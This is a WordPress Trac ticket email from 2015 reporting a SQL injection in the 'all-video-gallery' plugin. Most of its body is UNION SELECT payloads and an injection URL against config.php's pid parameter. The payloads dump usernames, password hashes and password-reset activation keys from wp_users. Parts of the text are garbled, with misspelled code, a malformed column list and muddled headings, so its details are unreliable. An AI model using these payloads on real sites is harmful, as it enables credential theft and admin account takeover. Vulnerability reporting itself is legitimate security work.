[wp-trac] [WordPress Trac] #32427: XMIL FILE FIND BUFFER/XMIL Password Reset Admin email/to get password
WordPress Trac
noreply at wordpress.org
Mon May 18 15:11:39 UTC 2015
#32427: XMIL FILE FIND BUFFER/XMIL Password Reset Admin email/to get password
----------------------------------------------+----------------------------
Reporter: Nehal227 | Owner:
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting
Component: General | Review
Severity: normal | Version: 4.1
Focuses: javascript, docs, administration | Keywords:
----------------------------------------------+----------------------------
Vulnerabilities
-1 union Select
1,2,3,4,5,6,group_concat(user_login,----,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40
from wp_users
"SELECT * FROM ".$wpDP-DP>Prefix."aliivideodallery_profles WHERE
id=".$_pid
$_pid=$_GET['pid']
ONE WHY TO PASS WE GET IN
http://{Domain_Name_Here}/wp-content/plugins/all-video-
gallery/config.php?vid=1&pid=11&pid={union Query here}
query
"SELECT * FROM ".$wpdb->;prefix."allvideogallery_profiles WHERE id=-1
union Select
1,2,3,4,5,6,group_concat(user_login,0xa,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40
from wp_users
XMIL FILE FIND BUFFER
-1 union Select
1,2,3,4,5,6,group_concat(user_login,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40
from wp_users
XMIL Password Reset Admin email
-1 union Select
1,2,3,4,5,6,group_concat(user_login,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40
from wp_users
--
Ticket URL: <https://core.trac.wordpress.org/ticket/32427>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list